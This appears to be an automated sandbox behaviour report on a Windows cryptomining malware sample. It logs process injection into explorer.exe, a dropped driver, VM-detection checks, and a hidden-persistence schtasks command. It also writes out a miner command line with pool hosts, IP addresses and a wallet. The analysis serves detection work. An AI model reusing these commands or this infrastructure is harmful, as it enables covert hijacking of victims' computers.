              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
              Source: WR64.sys.9.drBinary string: \Device\WinRing0_1_2_0
              Source: classification engineClassification label: mal100.evad.mine.winEXE@26/6@2/1
              Source: C:\Windows\System32\conhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: pcNCraWcRkJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: pcNCraWcRk.exeStatic file information: File size 2234368 > 1048576
              Source: pcNCraWcRk.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00623B00 push rax; retf 0_2_00623B01
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00623BFF push rax; iretd 0_2_00623C01
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_006238C0 push rax; retn 0009h0_2_006238C1
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00623AB7 push rax; retf 0009h0_2_00623AC1
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EDE0000 push es; iretd 1_2_0000025F5EDE0098
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E0E0000 push es; iretd 9_2_000002C94E0E0098
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409B00 push rax; retf 13_2_00409B01
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_004098C0 push rax; retn 0009h13_2_004098C1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409BFF push rax; iretd 13_2_00409C01
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409AB7 push rax; retf 0009h13_2_00409AC1
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A780EE0000 push es; iretd 15_2_000002A780EE0098

              Persistence and Installation Behavior:

              barindex
              Sample is not signed and drops a device driverShow sources
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Query firmware table information (likely to detect VMs)Show sources
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 35000Jump to behavior
              Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
              Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 198.23.214.117 144Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: xmr.givemexyz.in
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeMemory written: C:\Windows\System32\conhost.exe base: 25F5EDE0000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 2C94E0E0000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 886010Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 2A780EE0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 16CC3390000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: DB8010Jump to behavior
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25F5EDE0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2C94E0E0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2A780EE0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 16CC3390000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processesShow sources
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5AJump to behavior
              Injects code into the Windows Explorer (explorer.exe)Show sources
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140000000 value: 4DJump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140001000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140367000 value: 1EJump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 1404A0000 value: F0Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140753000 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140775000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140776000 value: C5Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140777000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140779000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 14077B000 value: 60Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 14077C000 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 14077D000 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 886010 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140000000 value: 4DJump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140001000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140367000 value: 1EJump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 1404A0000 value: F0Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140753000 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140775000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140776000 value: C5Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140777000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140779000 value: 48Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 14077B000 value: 60Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 14077C000 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 14077D000 value: 00Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: DB8010 value: 00Jump to behavior
              Modifies the context of a thread in another process (thread injection)Show sources
              Source: C:\Windows\System32\conhost.exeThread register set: target process: 6764Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread register set: target process: 6784Jump to behavior
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeThread created: C:\Windows\System32\conhost.exe EIP: 5EDE0000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: 4E0E0000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: 80EE0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeThread created: C:\Windows\System32\conhost.exe EIP: C3390000Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
